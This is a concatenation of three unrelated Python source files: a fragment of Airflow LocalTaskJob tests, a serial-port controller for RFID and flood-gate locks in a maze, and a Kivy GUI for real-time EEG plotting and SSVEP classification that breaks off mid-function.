dr = dag.create_dagrun(run_id="test",
state=State.SUCCESS,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE,
session=session)
ti = dr.get_task_instance(task_id=op1.task_id, session=session)
ti.state = State.RUNNING
ti.hostname = "blablabla"
session.commit()
job1 = LocalTaskJob(task_instance=ti,
ignore_ti_state=True,
executor=SequentialExecutor())
self.assertRaises(AirflowException, job1.heartbeat_callback)
mock_pid.return_value = 1
ti.state = State.RUNNING
ti.hostname = get_hostname()
ti.pid = 1
session.merge(ti)
session.commit()
job1.heartbeat_callback(session=None)
mock_pid.return_value = 2
self.assertRaises(AirflowException, job1.heartbeat_callback)
@patch('os.getpid')
def test_heartbeat_failed_fast(self, mock_getpid):
"""
Test that task heartbeat will sleep when it fails fast
"""
mock_getpid.return_value = 1
self.mock_base_job_sleep.side_effect = time.sleep
with create_session() as session:
dagbag = models.DagBag(
dag_folder=TEST_DAG_FOLDER,
include_examples=False,
)
dag_id = 'test_heartbeat_failed_fast'
task_id = 'test_heartbeat_failed_fast_op'
dag = dagbag.get_dag(dag_id)
task = dag.get_task(task_id)
dag.create_dagrun(run_id="test_heartbeat_failed_fast_run",
state=State.RUNNING,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE,
session=session)
ti = TI(task=task, execution_date=DEFAULT_DATE)
ti.refresh_from_db()
ti.state = State.RUNNING
ti.hostname = get_hostname()
ti.pid = 1
session.commit()
job = LocalTaskJob(task_instance=ti, executor=MockExecutor(do_update=False))
job.heartrate = 2
heartbeat_records = []
job.heartbeat_callback = lambda session: heartbeat_records.append(job.latest_heartbeat)
job._execute()
self.assertGreater(len(heartbeat_records), 2)
for i in range(1, len(heartbeat_records)):
time1 = heartbeat_records[i - 1]
time2 = heartbeat_records[i]
self.assertGreaterEqual((time2 - time1).total_seconds(), job.heartrate)
@unittest.skipIf('mysql' in conf.get('core', 'sql_alchemy_conn'),
"flaky when run on mysql")
@unittest.skipIf('postgresql' in conf.get('core', 'sql_alchemy_conn'),
'flaky when run on postgresql')
def test_mark_success_no_kill(self):
"""
Test that ensures that mark_success in the UI doesn't cause
the task to fail, and that the task exits
"""
dagbag = models.DagBag(
dag_folder=TEST_DAG_FOLDER,
include_examples=False,
)
dag = dagbag.dags.get('test_mark_success')
task = dag.get_task('task1')
session = settings.Session()
dag.clear()
dag.create_dagrun(run_id="test",
state=State.RUNNING,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE,
session=session)
ti = TI(task=task, execution_date=DEFAULT_DATE)
ti.refresh_from_db()
job1 = LocalTaskJob(task_instance=ti, ignore_ti_state=True)
process = multiprocessing.Process(target=job1.run)
process.start()
ti.refresh_from_db()
for _ in range(0, 50):
if ti.state == State.RUNNING:
break
time.sleep(0.1)
ti.refresh_from_db()
self.assertEqual(State.RUNNING, ti.state)
ti.state = State.SUCCESS
session.merge(ti)
session.commit()
process.join(timeout=10)
self.assertFalse(process.is_alive())
ti.refresh_from_db()
self.assertEqual(State.SUCCESS, ti.state)
def test_localtaskjob_double_trigger(self):
dagbag = models.DagBag(
dag_folder=TEST_DAG_FOLDER,
include_examples=False,
)
dag = dagbag.dags.get('test_localtaskjob_double_trigger')
task = dag.get_task('test_localtaskjob_double_trigger_task')
session = settings.Session()
dag.clear()
dr = dag.create_dagrun(run_id="test",
state=State.SUCCESS,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE,
session=session)
ti = dr.get_task_instance(task_id=task.task_id, session=session)
ti.state = State.RUNNING
ti.hostname = get_hostname()
ti.pid = 1
session.merge(ti)
session.commit()
ti_run = TI(task=task, execution_date=DEFAULT_DATE)
ti_run.refresh_from_db()
job1 = LocalTaskJob(task_instance=ti_run,
executor=SequentialExecutor())
from airflow.task.task_runner.standard_task_runner import StandardTaskRunner
with patch.object(StandardTaskRunner, 'start', return_value=None) as mock_method:
job1.run()
mock_method.assert_not_called()
ti = dr.get_task_instance(task_id=task.task_id, session=session)
self.assertEqual(ti.pid, 1)
self.assertEqual(ti.state, State.RUNNING)
session.close()
def test_localtaskjob_maintain_heart_rate(self):
dagbag = models.DagBag(
dag_folder=TEST_DAG_FOLDER,
include_examples=False,
)
dag = dagbag.dags.get('test_localtaskjob_double_trigger')
task = dag.get_task('test_localtaskjob_double_trigger_task')
session = settings.Session()
dag.clear()
dag.create_dagrun(run_id="test",
state=State.SUCCESS,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE,
session=session)
ti_run = TI(task=task, execution_date=DEFAULT_DATE)
ti_run.refresh_from_db()
job1 = LocalTaskJob(task_instance=ti_run,
executor=SequentialExecutor())
# this should make sure we only heartbeat once and exit at the second
# loop in _execute()
return_codes = [None, 0]
def multi_return_code():
return return_codes.pop(0)
time_start = time.time()
from airflow.task.task_runner.standard_task_runner import StandardTaskRunner
with patch.object(StandardTaskRunner, 'start', return_value=None) as mock_start:
with patch.object(StandardTaskRunner, 'return_code') as mock_ret_code:
mock_ret_code.side_effect = multi_return_code
job1.run()
self.assertEqual(mock_start.call_count, 1)
self.assertEqual(mock_ret_code.call_count, 2)
time_end = time.time()
self.assertEqual(self.mock_base_job_sleep.call_count, 1)
self.assertEqual(job1.state, State.SUCCESS)
# Consider we have patched sleep call, it should not be sleeping to
# keep up with the heart rate in other unpatched places
#
# We already make sure patched sleep call is only called once
self.assertLess(time_end - time_start, job1.heartrate)
session.close()
|
maze-2fg-rfid.py
|
#!/usr/bin/python
PWM_WARMUP_MS = 100
PWM_DC = 30
PWM_REFRESH_PERIOD = 2
import sys
from argparse import ArgumentParser
from threading import Thread, Lock
from serial import Serial
from time import sleep
import signal
import re, random
from time import time, strftime
class Tty(object):
s = None
def __init__(self, dev, baud=115200, timeout=5):
self.s = Serial(port=dev, baudrate=baud, timeout=timeout)
self.s.read_all()
def __del__(self):
if self.s:
self.s.close()
class Rfid(Tty):
def __init__(self, dev, baud=115200, timeout=5):
super(Rfid, self).__init__(dev, baud, timeout)
self.s.write(".ES0\r") # Disable auto shutdown
self.s.readline()
self.s.write(".RT05\r") # Set read timeout
self.s.readline()
self.s.write(".RB1\r") # Enable read beep
self.s.readline()
def read(self):
self.s.write(".r\r")
self.s.readline()
return self.s.readline().strip()
class Gate(Tty):
def __init__(self, dev, baud=115200, timeout=5, ngpio=8, npwm=4):
super(Gate, self).__init__(dev, baud, timeout)
self.ngpio = ngpio
self.gpio_state = tuple([0 for i in range(ngpio)])
self.gpio_map = 0b00000000
self.pwm_state = [0 for i in range(npwm)]
self.pwm_map = 0b0000
self.s.write("\recho 0\r")
sleep(1)
self.s.read_all()
def pwm(self, i, duty_cycle, warmup_ms=100):
self.s.write("pwm %d %d %d\r" % (i, warmup_ms, duty_cycle))
self.pwm_state[i] = 1 if duty_cycle > 0 else 0
self.pwm_map = (self.pwm_map | 2**i) \
if duty_cycle > 0 \
else (self.pwm_map & ~2**i)
def rfid_charge(self, i=0):
d = 0 if i == 0 else 1
self.s.write("gpio 8 %d\r" % d)
def gpio_poll(self, block, binary=False):
if not block:
return self.gpio_state
while 1:
s = self.s.readline()
if s == "":
return self.gpio_map if binary else self.gpio_state
ss = s.split()
if ss[0] != "gpio:":
continue
x = int(ss[1], 0x10)
self.gpio_map = x % 0x100 # leave only 8 bits
ret = map(lambda i, x=x: 1 if x & (1 << i) else 0,
range(self.ngpio))
self.gpio_state = ret
return self.gpio_map if binary else self.gpio_state
class StateMachine(object):
def __init__(self, _gate, rfid=None):
self.gate = _gate
self.rfid = rfid
self.of = sys.stdout
self.pwm_lock = Lock()
self.pwm_state = [0,0,0,0]
self.pwm_refresh()
self.gpio_state = [0,0,0,0,0,0,0,0]
self.gpio_map = 0b00000000
self.close_threads = {} # empty dict for storing threads
self.close_kills = {}
self.gpio_kill = False
def start(self):
self.gate.rfid_charge(1)
self.gpio_thread = Thread(target=self.gpio_refresh)
self.gpio_thread.start()
def stop(self):
self.of.write('TURNING OFF\n')
self.of.flush()
self.gpio_kill = True
self.gpio_thread.join()
self.of.write('MAIN killed\n')
self.of.flush()
self.pwm_state = [0,0,0,0]
self.pwm_refresh()
self.of.write('All doors are opened!\n')
for i in [0,1]:
try:
self.close_kills[0] = True
self.close_threads[0].join()
self.of.write('Close %d killed\n' % (i))
self.of.flush()
except KeyError:
self.of.write('skip kill %d\n' % (i))
self.of.flush()
def pwm_refresh(self):
self.pwm_lock.acquire()
for i in range(len(self.pwm_state)):
self.gate.pwm(i, self.pwm_state[i]*PWM_DC, \
self.pwm_state[i]*PWM_WARMUP_MS)
self.pwm_lock.release()
def gpio_refresh(self):
while True:
if self.gpio_kill:
return
self.gpio_map = self.gate.gpio_poll(1, binary=True)
self.of.write( strftime("%Y-%m-%d %H:%M:%S ") + \
format(self.gpio_map, '08b') + ' | '+ format(self.gate.pwm_map, '04b')+'\n' )
self.of.flush()
# flood-gate control at FG-1
if (( 0b0001 & self.gate.pwm_map) == 0b0000 ) and \
( ( 0b00000111 & self.gpio_map ) == 0b00000100):
self.setCloseLock(0, 1, wtime=2)
if ( 0b00000011 & self.gpio_map ):
self.setCloseLock(0, 0)
if (( 0b0001 & self.gate.pwm_map) == 0b0001 ) and \
( ( 0b00001100 & self.gpio_map ) == 0b00000000):
self.setCloseLock(1, 1, wtime=4)
if ( 0b00001100 & self.gpio_map ):
self.setCloseLock(1, 0)
# flood-gate control at FG-2
if (( 0b0100 & self.gate.pwm_map) == 0b0000 ) and \
( ( 0b01110000 & self.gpio_map ) == 0b01000000):
self.setCloseLock(2, 1, wtime=2)
if ( 0b00110000 & self.gpio_map ):
self.setCloseLock(2, 0)
if (( 0b0100 & self.gate.pwm_map) == 0b0100 ) and \
( ( 0b11000000 & self.gpio_map ) == 0b00000000):
self.setCloseLock(3, 1, wtime=4)
if ( 0b11000000 & self.gpio_map ):
self.setCloseLock(3, 0)
def setCloseLock(self, nlock, state, wtime=4):
self.of.write('Lock %d => %d\n' % (nlock, state))
self.of.flush()
if state:
try:
__a = self.close_threads[nlock]
# thread was already started
except KeyError:
self.close_kills[nlock] = 0
self.close_threads[nlock] = Thread(target=self.closeBody, args=(nlock, wtime) )
self.close_threads[nlock].start()
else:
try:
__a = self.close_threads[nlock]
self.close_kills[nlock] = 1
self.close_threads[nlock].join()
del(self.close_threads[nlock])
except KeyError:
pass
def closeBody(self, nlock, wtime):
uid = random.randint(0,1e8)
self.of.write('CLOSE-%d <%d> STARTED\n' % (nlock, uid) )
self.of.flush()
wtime = float(wtime)
NTICKS = 100
for i in range(NTICKS):
sleep(wtime/NTICKS)
if self.close_kills[nlock]:
self.of.write('CLOSE-%d <%d> STOPPED\n' % (nlock, uid))
self.of.flush()
return
self.of.write('CLOSE-%d <%d> CLOSING\n' % (nlock, uid) )
self.of.flush()
self.pwm_lock.acquire()
# FG-1 behaviors
if (nlock == 0):
if (self.rfid is None):
self.of.write(' RFID reading SKIPPED \n')
else:
self.gate.rfid_charge(0)
self.rfid_read()
self.gate.rfid_charge(1)
self.gate.pwm(0, PWM_DC, PWM_WARMUP_MS)
self.gate.pwm(1, 0, 0)
self.of.write(' =======000000000000================ \n')
self.of.flush()
self.pwm_lock.release()
elif (nlock == 1):
self.gate.pwm(0, 0, 0)
self.gate.pwm(1, PWM_DC, PWM_WARMUP_MS)
self.of.write(' =======111111111111================ \n')
self.of.flush()
self.pwm_lock.release()
# FG-2 behaviors
elif (nlock == 2):
self.gate.pwm(2, PWM_DC, PWM_WARMUP_MS)
self.gate.pwm(3, 0, 0)
self.of.write(' =======222222222222================ \n')
self.of.flush()
self.pwm_lock.release()
elif (nlock == 3):
self.gate.pwm(2, 0, 0)
self.gate.pwm(3, PWM_DC, PWM_WARMUP_MS)
self.of.write(' =======333333333333================ \n')
self.of.flush()
self.pwm_lock.release()
self.of.write('CLOSE-%d <%d> CLOSED\n' % (nlock, uid))
self.of.flush()
def rfid_read(self):
self.rfid_id = ""
MAX_READ_TRIES=3
rt = 0
while (rt < MAX_READ_TRIES) and len(self.rfid_id) < 5:
print "RFID: start read"
self.rfid_id = self.rfid.read().strip()
rt += 1
self.of.write("RFID: id=%s \n" % self.rfid_id)
class ServiceExit(Exception):
"""
Custom exception which is used to trigger the clean exit
of all running threads and the main program.
"""
pass
def service_shutdown(signum, frame):
print('Caught signal %d' % signum)
raise ServiceExit
if __name__ == "__main__":
signal.signal(signal.SIGTERM, service_shutdown)
signal.signal(signal.SIGINT, service_shutdown)
p = ArgumentParser(description="maze control")
p.add_argument('-g', dest="gate", metavar='/dev/ttyX',
type=str, help='gate interface', required=1)
p.add_argument('-r', dest="rfid", metavar='/dev/ttyY',
type=str, help='RFID interface', required=0)
p.add_argument('-l', dest="log", metavar='FILE',
type=str, help='log file', default='maze.log')
a = p.parse_args()
g = Gate(a.gate)
r = Rfid(a.rfid) if a.rfid else None
m = StateMachine(g, rfid=r)
try:
m.start()
while True:
sleep(0.5)
except ServiceExit:
m.stop()
print 'exiting main'
'''
try:
while True:
print '1'
sleep(5)
except KeyboardInterrupt:
print '..stoppping..'
m.stop()
print '..stopped!'
'''
|
main.py
|
from __future__ import print_function,unicode_literals,with_statement,division
# kivy related
import matplotlib
import threading
matplotlib.use('module://kivy.garden.matplotlib.backend_kivy')
from matplotlib import pyplot as plt
from kivy.garden.graph import MeshLinePlot
#import matplotlib.animation as animation
from kivy.app import App
from kivy.uix.boxlayout import BoxLayout
from kivy.uix.popup import Popup
from kivy.clock import Clock
from kivy.properties import StringProperty,ListProperty
from kivy.uix.screenmanager import ScreenManager, Screen
import socket
import struct
import numpy as np
import pandas as pd
from scipy import signal
from functools import partial
from colorama import Fore, Back, Style, init
import logging
import time
# Kivy Material Design
from kivymd.theming import ThemeManager
from BCIEncode import sequence
__author__ = 'Guoli Lv'
__email__ = 'guoli-lv@hotmail.com'
class CountDown(BoxLayout):
pass
class SerialPortSelection(BoxLayout):
""" Select Serial Port on GUI """
unlimited = True
save_directory = 'data'
def __init__(self,**kwargs):
super(SerialPortSelection,self).__init__(**kwargs)
# kv file is load after rendering. So in __init__ it's impossible to access widget by ids for no widget has been renderred. Then we can use Clock.schedule_once(..., 0) to schedule the call to a function relying on ids.
Clock.schedule_once(self.scanPorts,0)
Clock.schedule_once(self.popupHintOnConnectionFailedConfig,0)
def popupHintOnConnectionFailedConfig(self,dt=0):
# Connection Failed popup hint configuration
self.popup = Popup(title='Connection Failed',id='popup')
App.get_running_app().root.current_screen.add_widget(self.popup)
App.get_running_app().root.current_screen.remove_widget(self.popup)
def clear_filename(self):
self.ids['filename'].text = ''
def changeState(self,state):
if state == 'down':
con = App.get_running_app().connect(self.ids['uart'].text)
if self.ids['duration'].text != 'Unlimited':
self.unlimited = False
self.countDown = CountDown()
self.parent.add_widget(self.countDown)
self.duration = int(self.ids['duration'].text[:-1])
self.remained = int(self.ids['duration'].text[:-1])
self.countDown.ids['remaingTime'].text = self.ids['duration'].text
self.countDown.ids['progress'].value = 0
App.get_running_app().save = True
Clock.schedule_interval(self.tick,1/10)
# When connection failed
if con is False:
self.ids['connect'].state = 'normal'
# Popup hint and rescan serial devices
self.popup.open()
Clock.schedule_once(self.popup.dismiss ,1)
self.scanPorts()
else:
data = App.get_running_app().disconnect()
if not self.unlimited:
Clock.unschedule(self.tick)
self.parent.remove_widget(self.countDown)
App.get_running_app().save = False
filename = self.ids['filename'].text
if len(filename) == 0:
filename = time.strftime("%Y-%m-%d_%H-%M-%S", time.localtime())
np.savetxt('./%s/BCI-%s.txt'%(self.save_directory, filename),App.get_running_app().toSave)
App.get_running_app().toSave = list()
def tick(self,dt):
self.remained -= dt
self.countDown.ids['remaingTime'].text = '%d s' % self.remained
self.countDown.ids['progress'].value = (1 - self.remained/self.duration) * 100
if self.remained <= 0:
self.ids['connect'].state = 'normal'
def scanPorts(self,dt=0):
pass
class FFT(BoxLayout):
""" Real Time frequency-domain Plotting """
length = 128 # FFT length
fftLen = 1024
plotScale = 4 # (integer) After FFT there are much points as fftLen/2 to plot. Considerable to reduce the points.
autoScale = True
def __init__(self,**kwargs):
super(FFT,self).__init__(**kwargs)
self.fs = App.get_running_app().fs
self.ts = 1.0/self.fs # Sampling interval
self.xscale = self.fs/4
self.xcenter = self.fs/2
# Configure real time fft figure with matplotlib
self.fig, self.ax = plt.subplots()
#plt.ion() #Never turn this on. Or enjoy a almost frozen Application.
# Settings
self.ax.xaxis.set_label_coords(0.9, -0.01)
self.ax.yaxis.set_label_coords(-0.00, 1.05)
self.ax.set_xlabel('Freq(Hz)')
self.ax.set_ylabel('Amplitude(uV)',rotation=0)
# self.ax.set_title('PSD')
self.ax.set_title('FFT')
# x-axis, ts = 1/fs
self.f = np.fft.rfftfreq(self.fftLen,self.ts)
fPos = self.f#[self.f>=0]
fPlot = [fPos[i] for i in range(len(fPos)) if np.mod(i,self.plotScale) == 0 ]
self.plotLen = len(fPlot)
# Set X padding
padding = (np.max(fPlot) - np.min(fPlot)) * 0.01
self.ax.set_xlim([np.min(fPlot)-padding,np.max(fPlot)+padding])
self.FFTplot, = self.ax.plot(fPlot,np.zeros_like(fPlot))
# self.fig.canvas.mpl_connect('scroll_event', self.figure_scroll)
self.add_widget(self.fig.canvas)
# def start(self):
# Clock.unschedule(self.refresh)
# Clock.schedule_interval(self.refresh,1/self.fps)
#
# def stop(self):
# Clock.unschedule(self.refresh)
# self.FFTplot.set_ydata(np.zeros(self.fftLen))
# self.ax.set_ylim([-1,1])
# plt.draw()
def figure_scroll(self,event):
print('scroll event from mpl ', event.x, event.y, event.step, event.button)
def clear(self, dt=0):
y = self.FFTplot.get_ydata()
self.FFTplot.set_ydata(np.zeros(len(y)))
self.ax.set_ylim([0,1])
plt.draw_all()
def set_fft_length(self, FixedFFTLen=False):
self.length = int(self.ids['fftLen'].text)
if not FixedFFTLen:
self.fftLen = self.length
self.f = np.fft.rfftfreq(self.fftLen,self.ts)
# fPos = self.f[self.f>=0]
# fPlot = [fPos[i] for i in range(len(fPos)) if np.mod(i,self.plotScale) == 0 ]
fPos = self.f
fPlot = [fPos[i] for i in range(len(fPos)) if np.mod(i,self.plotScale) == 0 ]
self.plotLen = len(fPlot)
self.FFTplot.set_data(fPlot,np.zeros_like(fPlot))
def set_scale(self):
self.scale = self.ids['scale'].text
if self.ids['scale'].text == 'Auto':
self.autoScale = True
else:
self.autoScale = False
if self.scale == '10μV':
self.ax.set_ylim([0,10])
elif self.scale == '100μV':
self.ax.set_ylim([0,100])
elif self.scale == '1mV':
self.ax.set_ylim([0,1000])
elif self.scale == '10mV':
self.ax.set_ylim([0,10000])
elif self.scale == '100mV':
self.ax.set_ylim([0,1e5])
elif self.scale == '1000mV':
self.ax.set_ylim([0,1e6])
def set_horizontal_width(self):
self.xcenter = self.ids['horizon'].value
self.ax.set_xlim([self.xcenter - self.xscale , self.xcenter + self.xscale])
def set_xscale(self):
self.xscale = self.fs/4 / self.ids['xscale'].value
xmin = self.xscale
xmax = self.fs/2 - self.xscale
self.ids['horizon'].range = (xmin,xmax)
if self.xcenter - self.xscale < 0:
self.ids['horizon'].value = xmin
elif self.xcenter + self.xscale > self.fs/2:
self.ids['horizon'].value = xmax
self.ax.set_xlim([self.xcenter - self.xscale , self.xcenter + self.xscale])
def refresh(self):
data = App.get_running_app().filteredData
if len(data) < self.length:
return False
# logging.info("Refreshing. Length of data:%d"%(len(data)))
# Clear
#self.ax.cla()
# Get data
y = data[-self.length:] # * signal.blackman(self.length, sym=0)
# PSD
# x,YPlot = signal.periodogram(y,fs=self.fs,nfft=None,window='hamming')
# YPlot = 10 * np.log(YPlot)
# x = x[1:]
# YPlot = YPlot[1:]
# self.FFTplot.set_data(x,YPlot)
# FFT
Y = np.fft.rfft(y,self.fftLen)
YampPos = np.abs(Y/self.fs)
# YampPos[1:-1] = YampPos[1:-1] * 2
YPlot = [YampPos[i] for i in range(len(YampPos)) if np.mod(i,self.plotScale)==0 ]
# YPlot = YampPos
self.FFTplot.set_ydata(YPlot)
if self.autoScale:
# Set y padding
padding = (np.max(YPlot) - np.min(YPlot)) * 0.1
# TODO To improve figure ylimits stability
if padding > 0.1:
self.ax.set_ylim([np.min(YPlot)-padding,np.max(YPlot)+padding])
plt.draw_all()
#self.ax.plot(fPlot,YPlot)
class RealTimePlotting(BoxLayout):
scale = 'Auto'
plotScale = 2
# band = np.array([49,51])
"""Real Time time-domain Plotting """
def __init__(self,**kwargs):
super(RealTimePlotting ,self).__init__(**kwargs)
self.fs = App.get_running_app().fs
self.length = self.fs * 4
# Configure real time fft figure with matplotlib
self.fig, self.ax = plt.subplots()
#plt.ion() #Never turn this on. Or enjoy a almost frozen Application.
# Settings
self.ax.set_xlabel('Time(seconds)')
self.ax.xaxis.set_label_coords(0.8, -0.01)
self.ax.yaxis.set_label_coords(-0.00, 1.05)
self.ax.set_ylabel('Amplitude(uV)',rotation=0)
self.ax.get_xaxis().set_visible(True)
#self.ax.set_title('Real Time Plotting')
# Plot x data once. Then we only need to update y data
x = np.arange(0,self.length)/self.fs
x= [x[i] for i in range(len(x)) if np.mod(i,self.plotScale)==0 ]
self.ax.set_xlim([np.min(x),np.max(x)])
self.RealTimePlot, = self.ax.plot([],[])
self.RealTimePlot.set_xdata(x)
self.RealTimePlot.set_ydata(np.zeros_like(x).tolist())
self.add_widget(self.fig.canvas)
# def start(self):
# Clock.unschedule(self.refresh)
# Clock.schedule_interval(self.refresh,1/self.fps)
# def stop(self):
# Clock.unschedule(self.refresh)
# self.RealTimePlot.set_ydata(np.zeros(self.length))
# self.ax.set_ylim([-1,1])
# plt.draw()
def clear(self,dt=0):
self.RealTimePlot.set_ydata(np.zeros(int(self.length/self.plotScale)).tolist())
self.ax.set_ylim([-1,1])
plt.draw_all()
def refresh(self):
# TODO Now real time plotting and FFT cannot be showed on the same time
# y_raw = App.get_running_app().data[-self.length:]
y_raw = App.get_running_app().filteredData[-self.length:]
y= [y_raw[i] for i in range(len(y_raw)) if np.mod(i,self.plotScale)==0 ]
# Frequency Domain filter
# b,a = signal.butter(4,[5 /(self.fs/2),45 /(self.fs/2)],'band')
# y = signal.filtfilt(b,a,y_raw)
self.RealTimePlot.set_ydata(y)
if self.scale == 'Auto':
ymin,ymax = self.ax.get_ylim()
if ymax - ymin !=0:
padding = ( np.max(y) - np.min(y) )*0.1
if np.min(y) < ymin or np.max(y) > ymax or padding < (ymax - ymin) *0.1 and (ymax-ymin)>10:
padding = (np.max(y) - np.min(y)) * 0.1
# TODO To improve figure ylimits stability
self.ax.set_ylim([np.min(y)-padding, np.max(y)+padding])
plt.draw_all()
def set_filter(self):
if self.ids['filters'].text == 'None':
App.get_running_app().refresh_filter(0,0,'None')
elif self.ids['filters'].text == 'Highpass:4Hz':
fs = App.get_running_app().fs
App.get_running_app().refresh_filter(4,fs/2,ftype='highpass')
elif self.ids['filters'].text == '4Hz-60Hz':
App.get_running_app().refresh_filter(4,60)
elif self.ids['filters'].text == '4Hz-45Hz':
App.get_running_app().refresh_filter(4,45)
def set_notch(self):
if self.ids['notch'].text == 'None':
App.get_running_app().refresh_notch_filter(50,False)
elif self.ids['notch'].text == '50Hz':
App.get_running_app().refresh_notch_filter(50,True)
elif self.ids['notch'].text == '60Hz':
App.get_running_app().refresh_notch_filter(60,True)
def set_length(self):
if self.ids['length'].text == '0.5s':
self.length = int(self.fs * 0.5)
elif self.ids['length'].text == '1s':
self.length = self.fs * 1
elif self.ids['length'].text == '2s':
self.length = self.fs * 2
elif self.ids['length'].text == '3s':
self.length = self.fs * 3
elif self.ids['length'].text == '4s':
self.length = self.fs * 4
x_raw = np.arange(0,self.length)/self.fs
x= [x_raw[i] for i in range(len(x_raw)) if np.mod(i,self.plotScale)==0 ]
y_raw = App.get_running_app().data[-self.length:]
y= [y_raw[i] for i in range(len(y_raw)) if np.mod(i,self.plotScale)==0 ]
self.ax.set_xlim([np.min(x),np.max(x)])
self.RealTimePlot.set_data(x,y)
plt.draw_all()
class Test(Screen):
"""Test Layout"""
# Settings
theme_cls = ThemeManager()
def __init__(self, **kwargs):
""" Initializing serial and plot
"""
super(Test,self).__init__(**kwargs)
''' BLINKING
'''
# for i in range(12):
# Clock.schedule_interval(partial(self.blinking,i),1/(0+12))
def blinking(self,idx,dt):
widgetID = 'button%d' % idx
if self.ids[widgetID].state == 'normal':
self.ids[widgetID].state = 'down'
self.ids[widgetID].trigger_action(0.01)
if self.ids[widgetID].state == 'down':
self.ids[widgetID].state = 'normal'
self.ids[widgetID].trigger_action(0.01)
class Blink(Screen):
# Settings
theme_cls = ThemeManager()
def __init__(self, **kwargs):
""" Initializing serial and plot
:returns: TODO
"""
super(Blink,self).__init__(**kwargs)
# ''' BLINKING
# '''
# for i in range(12):
# hz = 6 # i + 4
# Clock.schedule_interval(partial(self.blinking,i),1/(2*hz))
# def blinking(self,idx,dt):
# widgetID = 'button%d' % idx
# if self.ids[widgetID].state == 'normal':
# self.ids[widgetID].state = 'down'
# elif self.ids[widgetID].state == 'down':
# self.ids[widgetID].state = 'normal'
def set_freq(self):
"""
set screen blinking frequency
"""
freq = self.ids['freq'].value
self.ids['freqLabel'].text = "%dHz" % self.ids['freq'].value
for i in range(12):
Clock.unschedule(partial(self.blinking,i))
Clock.schedule_interval(partial(self.blinking,i),1/(freq*2))
def toggleBlink(self):
pass
class BlinkApp(App):
kv_directory = 'ui_template'
def __init__(self,**kwargs):
""" Initializing serial
:returns: TODO
"""
super(BlinkApp,self).__init__(**kwargs)
def build(self):
root = ScreenManager()
root.add_widget(Blink(name='bci'))
return root
class BCIApp(App):
# Settings
kv_directory = 'ui_template'
fps = 5
fs = 500
storedLen = 4096
data = list()
# Buffer
rawRemained = b'' # raw Data from serial, this should contain the data unused last time
save = False
toSave = list()
filteredDataNotch = list()
filteredData = list()
port = 23333
# Classification
lastF = {'f':False, 'count':0}
fBuffer = dict()
laststate = 0
ratio = 0.4
window = fs
tolerance = 0.5
interval = 0.2
decodeBuffer = [False, False, False]
def __init__(self,**kwargs):
""" Initializing serial
:returns: TODO
"""
init(autoreset=True)
self.data = np.zeros(self.storedLen).tolist()
self.filteredData = np.zeros(self.storedLen).tolist()
self.filteredDataNotch = np.zeros(self.storedLen).tolist()
self.refresh_notch_filter(50,True)
self.refresh_filter(4,45)
# self.b,self.a = signal.butter(4,[4 /(self.fs/2),30 /(self.fs/2)],'band')
super(BCIApp,self).__init__(**kwargs)
self.tcpSerSock = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
self.tcpSerSock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
#绑定服务端口
self.tcpSerSock.bind(("", self.port))
#开始监听
self.tcpSerSock.listen(5)
self.tcp = False
def on_stop(self):
if self.tcp:
self.disconnect()
def build(self):
root = ScreenManager()
root.add_widget(Test(name='bci'))
return root
def classify(self, dt):
def classifyNaive():
"""
Naive Classification
"""
with open('blinkState','r') as f:
state = int(f.read())
f.close()
if state:
y = self.filteredData[-self.window:]
Y = np.fft.rfft(y)
fs = App.get_running_app().fs
freq = np.fft.rfftfreq(len(y),1/fs)
powerSpectrum = np.abs(Y/fs)
data = pd.Series(powerSpectrum,index=freq)
# Sum PS on each Frequency
naive= dict()
for i in range(1, int(data.index.max())):
naive[i] = data[i-self.tolerance : i+self.tolerance].mean()
naive = pd.Series(naive)
maximum = naive.argmax()
noise = (naive.sum() - naive.max()) / (len(naive) - 1)
snr = naive.max()/noise
argmax = naive.argmax()
if argmax in [6,11,12,13]:
fmax = 12
elif argmax in [8,15,16,17]:
fmax = 8
elif argmax in [9,10,19,20,21,22]:
fmax = 10
else:
fmax = False
if fmax:
try:
self.fBuffer[fmax] += 1
except KeyError:
self.fBuffer[fmax] = 1
print("Max:%dHz %f SNR:%.3f F: %s%d%sHz"%(argmax, maximum, snr, Fore.GREEN, fmax, Fore.RESET))
else:
try:
self.fBuffer['invalid'] += 1
except KeyError:
self.fBuffer['invalid'] = 1
print("Max:%dHz %f SNR:%.3f F: %sInvaid%sHz"%(argmax, maximum, snr, Fore.RED, Fore.RESET))
# If state changed, stimuli freq should be determined and fList be dumped
if self.laststate != state and len(self.fBuffer) > 0 and self.laststate:
f,count = max(self.fBuffer.items(), key=lambda x: x[1])
# print(self.fBuffer)
total = sum(self.fBuffer.values())
if f == 'invalid':
print('%sNot certain%s' % (Fore.RED, Fore.RESET))
self.decodeBuffer[self.laststate-1] = False
elif count >= total * self.ratio:
print('%sStaring at %s%dHz%s' % (Fore.GREEN, Fore.YELLOW, f, Fore.RESET))
self.decodeBuffer[self.laststate-1] = f
else:
print('%sNot certain%s' % (Fore.RED, Fore.RESET))
self.decodeBuffer[self.laststate-1] = False
self.fBuffer = dict()
if self.laststate == 3:
print(self.decodeBuffer)
num = self.decode()
self.laststate = state
t = threading.Thread(target=classifyNaive)
t.start()
def decode(self):
if False in self.decodeBuffer:
return False
else:
for i in sequence:
if (sequence[i] == self.decodeBuffer).all():
print("%sSuccessfully selected %d%s"%( Fore.GREEN, i, Fore.RESET) )
with open('code','w') as f:
f.write(str(i))
f.flush()
f.close()
return i
def filt_notch(self,new):
self.xbufNotch += [new]
y = sum(self.bNotch * self.xbufNotch[::-1]) - sum(self.aNotch[1:] * self.ybufNotch[::-1])
self.xbufNotch= self.xbufNotch[1:]
self.ybufNotch += [y]
self.ybufNotch = self.ybufNotch[1:]
return y
def filt(self,new):
self.xbuf += [new]
y = sum(self.b * self.xbuf[::-1]) - sum(self.a[1:] * self.ybuf[::-1])
self.xbuf= self.xbuf[1:]
self.ybuf += [y]
self.ybuf = self.ybuf[1:]
return y
def refresh_notch_filter(self,f=50,enable=True):
if enable:
w0 = f/(self.fs/2)
self.bNotch,self.aNotch = signal.iirnotch(w0,1)
else:
self.bNotch = np.array([1])
self.aNotch = np.array([1])
